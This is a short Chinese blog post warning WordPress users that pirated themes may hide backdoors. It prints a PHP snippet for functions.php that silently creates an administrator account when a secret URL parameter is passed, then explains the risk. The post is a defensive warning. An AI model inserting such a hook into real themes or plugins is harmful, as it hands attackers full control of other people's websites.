WordPress盜版主題暗藏后門

wordpress 2023-10-29編輯：深圳網(wǎng)站建設(shè)閱讀（） WordPress 暗藏 后門

前言

俗話說的好天下沒有免費的午餐，你要相信沒有人傻到做虧本生意，都是會有目的性的。最近我在網(wǎng)上看到一篇文章，寫了WordPress的暗藏后門，覺得很有一說，所以就發(fā)一下讓更多的WP友友們看到，不要輕易隨便亂使用模板。

后門代碼

add_action(‘wp_head’, ‘holeinthewall’);
function holeinthewall() {
If ($_GET[‘backdoor’] == ‘go’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {
$user_id = wp_create_user(‘username’, ‘password’);
$user = new WP_User($user_id);
$user->set_role(‘a(chǎn)dministrator’);
}}}

由以上的代碼我們可以看出，如果把這段代碼插入到你的主題函數(shù)文件functions.php中的話，然后就會自動創(chuàng)建一個用戶名為username，密碼為password的有管理員權(quán)限的賬戶，然后惡意人員就可以登錄到你的網(wǎng)站后臺，后果你可以自己想象一下。

所以憧憬博主在這里建議大家不要隨便亂使用WordPress的盜版主題，支持正版，抵制盜版，尊重開發(fā)者的勞動成果。

• 上一章：WordPress付費會員制虛擬資源下載網(wǎng)站主...
• 下一章：WordPress VIP付費下載插件Erphpdown v...